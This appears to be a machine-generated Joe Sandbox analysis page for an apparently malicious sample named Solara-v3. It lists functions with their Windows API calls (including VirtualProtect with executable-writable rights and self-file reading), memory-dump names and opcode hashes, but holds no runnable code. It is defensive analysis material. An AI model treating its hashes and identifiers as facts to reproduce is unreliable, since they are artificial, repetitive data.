                                                                                                                                                                                                                                              control_flow_graph 448 cada52-cada57 449 cada59-cada71 448->449 450 cada7f-cada88 449->450 451 cada73-cada77 449->451 453 cada9a 450->453 454 cada8a-cada8d 450->454 451->450 452 cada79-cada7d 451->452 456 cadaf4-cadaf8 452->456 455 cada9c-cadaa9 GetStdHandle 453->455 457 cada8f-cada94 454->457 458 cada96-cada98 454->458 459 cadaab-cadaad 455->459 460 cadad6-cadae8 455->460 456->449 461 cadafe-cadb01 456->461 457->455 458->455 459->460 462 cadaaf-cadab8 GetFileType 459->462 460->456 463 cadaea-cadaed 460->463 462->460 464 cadaba-cadac3 462->464 463->456 465 cadacb-cadace 464->465 466 cadac5-cadac9 464->466 465->456 467 cadad0-cadad4 465->467 466->456 467->456
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00CAD941,00CC9330,0000000C), ref: 00CADA9E
                                                                                                                                                                                                                                              • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00CAD941,00CC9330,0000000C), ref: 00CADAB0
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileHandleType
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3000768030-0
                                                                                                                                                                                                                                              • Opcode ID: fae63e5968912e3b6d93566d89bb36c48da3a298ee17e062404b5a1a313d6cce
                                                                                                                                                                                                                                              • Instruction ID: 8359e644591cc480f46305b84c20f567bcad344b08e551b0d8e139006ea4cd69
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fae63e5968912e3b6d93566d89bb36c48da3a298ee17e062404b5a1a313d6cce
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C111967150C7434ACB308E7F8C887267A95AB57338B380759D1BBC69F1C674DE86E251
                                                                                                                                                                                                                                              Function 00C91EF0 Relevance: 3.1, APIs: 2, Instructions: 60memoryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00C91240: _strlen.LIBCMT ref: 00C912BA
                                                                                                                                                                                                                                              • FreeConsole.KERNELBASE(?,?,?,?,?,00C9173F,?,?,?,00000000,?), ref: 00C91F21
                                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(00CCA011,00000549,00000040,?), ref: 00C91F78
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleFreeProtectVirtual_strlen
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1248733679-0
                                                                                                                                                                                                                                              • Opcode ID: e5e9f9f41778950941fc4d8b29e1b4b9bf478507d0b6e3e79da8199b99bdfb7b
                                                                                                                                                                                                                                              • Instruction ID: 31da70a1cf8ca41b7c7a95351f74447f3ad80a833c5005f248e6ff6a7c0e8359
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5e9f9f41778950941fc4d8b29e1b4b9bf478507d0b6e3e79da8199b99bdfb7b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D11A071E402096BDF04BBA5EC0BFBE77B4EB44705F044439FA09A72C2EA759A5097D1
                                                                                                                                                                                                                                              Function 00CA5470 Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00CC8E38,0000000C), ref: 00CA5483
                                                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 00CA548A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorExitLastThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1611280651-0
                                                                                                                                                                                                                                              • Opcode ID: f560b58f38598b270b5109fa4d7dc9cbc3941f9625fa984a7aeedbe92ae23014
                                                                                                                                                                                                                                              • Instruction ID: 7536780d9785174cf53649e910bf05aaa0825c4df70025e1104db4f300125304
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f560b58f38598b270b5109fa4d7dc9cbc3941f9625fa984a7aeedbe92ae23014
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57F0C271A006169FDB00AFB0C94AF6E7B70FF46745F108059F00197292DF745942EB50
                                                                                                                                                                                                                                              Function 00C92270 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 00C92288
                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00C9229C
                                                                                                                                                                                                                                                • Part of subcall function 00C91FB0: CreateFileA.KERNELBASE ref: 00C92036
                                                                                                                                                                                                                                                • Part of subcall function 00C91FB0: GetFileSize.KERNEL32(00000000,00000000), ref: 00C92046
                                                                                                                                                                                                                                                • Part of subcall function 00C91FB0: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00C9206B
                                                                                                                                                                                                                                                • Part of subcall function 00C91FB0: CloseHandle.KERNELBASE(00000000), ref: 00C9207A
                                                                                                                                                                                                                                                • Part of subcall function 00C91FB0: _strlen.LIBCMT ref: 00C920CD
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$HandleModule$CloseCreateNameReadSize_strlen
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3505371420-0
                                                                                                                                                                                                                                              • Opcode ID: e03483bf023f375673a1a19e6581df13b462dd03d25923a928c260afab89272c
                                                                                                                                                                                                                                              • Instruction ID: a09c0848c368516c654e7385fedfc8024c61c1f1f2ee75aa430edac2d33e8105
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e03483bf023f375673a1a19e6581df13b462dd03d25923a928c260afab89272c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DEF0EDB2A002202BD6216764EC4FFAF7BACDF89710F000918F5894B281EA74165597D3
                                                                                                                                                                                                                                              Function 00CABED7 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000000,?,00CB02B4,?,00000000,?,?,00CAFF54,?,00000007,?,?,00CB089A,?,?), ref: 00CABEED
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00CB02B4,?,00000000,?,?,00CAFF54,?,00000007,?,?,00CB089A,?,?), ref: 00CABEF8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                                              • Opcode ID: 08fb8dac41f78276addc26dd3dd7723b045eaf5f5f50bb0a68b9d7b621aa5dd7
                                                                                                                                                                                                                                              • Instruction ID: 22adae0cfd9f3addca4d4dfd287556a900dda455215ed25c4b156492f739c9c1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08fb8dac41f78276addc26dd3dd7723b045eaf5f5f50bb0a68b9d7b621aa5dd7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3E08C32204215ABCB116FA4EC08F993B68FB01399F144061F618D6171DB308D40CB94
                                                                                                                                                                                                                                              Function 00CAC16A Relevance: 2.6, APIs: 2, Instructions: 71COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00CA5495,00CC8E38,0000000C), ref: 00CAC16E
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00CAC210
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                                                                                                                              • Opcode ID: 3f0a7cf1c5f5bcdbfb0855150e8a9ae46783aa7eaecce4d991074e5f0f54fed5
                                                                                                                                                                                                                                              • Instruction ID: d788fe3be2e5d6fcdc2c83e7ef3c8eaf3067293c0c8d832cae2a1d97e447b40f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f0a7cf1c5f5bcdbfb0855150e8a9ae46783aa7eaecce4d991074e5f0f54fed5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D711A0313856176BE7112BF5ECC7F2F266CAB0376CF140224F721910E3DB628D04A160
                                                                                                                                                                                                                                              Function 00C9DEF0 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: f88b6a9300c4cfc85ba61112d504b2f106fa843cfacf50f15a9c6452a92d71d7
                                                                                                                                                                                                                                              • Instruction ID: 5eb2c89efff8d4ba01439eaa0cc2b2b0534ab2098785aa4a3e51166637afacb8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f88b6a9300c4cfc85ba61112d504b2f106fa843cfacf50f15a9c6452a92d71d7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2417132A0011AEFCF14DFA9C4989EDB7B9FF18314B544069E446E7640E731EA55EB90
                                                                                                                                                                                                                                              Function 00C9CB40 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 755ff8568436966a505a08657b446bd87c27ae2402f519f4b94fae0b8bf4cde9
                                                                                                                                                                                                                                              • Instruction ID: ae6fb3ac60c233e1560502f3534165a8e3eb905d6f12d69cdef43be5655260df
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 755ff8568436966a505a08657b446bd87c27ae2402f519f4b94fae0b8bf4cde9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E631737290011AEFCF14DF68D9D49EDBBB8BF09320B14026AE526E3690E731E954DB90
                                                                                                                                                                                                                                              Function 00C9B060 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00C9AFC4: GetModuleHandleExW.KERNEL32(00000002,00000000,00C98A2A,?,?,00C9AF87,00C98A2A,?,00C9AF58,00C98A2A,?,?,?), ref: 00C9AFD0
                                                                                                                                                                                                                                              • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,3F29B6ED,?,?,?,Function_0002BE94,000000FF), ref: 00C9B0C7
                                                                                                                                                                                                                                                • Part of subcall function 00C9AEFA: std::_Throw_Cpp_error.LIBCPMT ref: 00C9AF1B
                                                                                                                                                                                                                                                • Part of subcall function 00C9EFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,00C98E4A,00C9A2F0), ref: 00C9EFE7
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CallbackCpp_errorExclusiveFreeHandleLibraryLockModuleReleaseReturnsThrow_Whenstd::_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3627539351-0
                                                                                                                                                                                                                                              • Opcode ID: 1f51ff9c1620dce8b8c5e27274763b8362b6176a21d7287d187e414e525b5cff
                                                                                                                                                                                                                                              • Instruction ID: 46b7fb1250c187389dc6ea0f790a6746c55c9f2dbd7c33cd75878245d89e8f18
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f51ff9c1620dce8b8c5e27274763b8362b6176a21d7287d187e414e525b5cff
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE11E772604640ABCF25ABA5ED1AF2E7769EF45B20F00442EF81597AD0CF35ED10DB91
                                                                                                                                                                                                                                              Function 00CACFD6 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: dd2721888b3ee126636738cf1c3abb7554c2833680e2e6e2fadac2e22a5d0875
                                                                                                                                                                                                                                              • Instruction ID: d38f4ad8f0becaa38a382a66497ceb76efd988950eb63da1afb8c5186c5524ba
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd2721888b3ee126636738cf1c3abb7554c2833680e2e6e2fadac2e22a5d0875
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4401F5332102165F9B1A8EA8EC81F1A337ABBC2724F258124F92387494DB32DC029750
                                                                                                                                                                                                                                              Function 00C9CB32 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalLeaveSection
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3988221542-0
                                                                                                                                                                                                                                              • Opcode ID: 668b0d3f86bb540a948570c563d35f6ea6a20c4c5c54008a778996e897db5942
                                                                                                                                                                                                                                              • Instruction ID: 4a6ede27b8ff15caa8a99c6a47bde1e6c5f6bc4bbb48ab08327e226a83160bc6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 668b0d3f86bb540a948570c563d35f6ea6a20c4c5c54008a778996e897db5942
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C90121767082868FCF059B78F8BD6A8BF20FF96338B2041AFE021854C1CB125964D700
                                                                                                                                                                                                                                              Function 00CAD2B4 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,?,?,00CAC1B7,00000001,00000364,?,00000005,000000FF,?,00CA5495,00CC8E38,0000000C), ref: 00CAD2F5
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
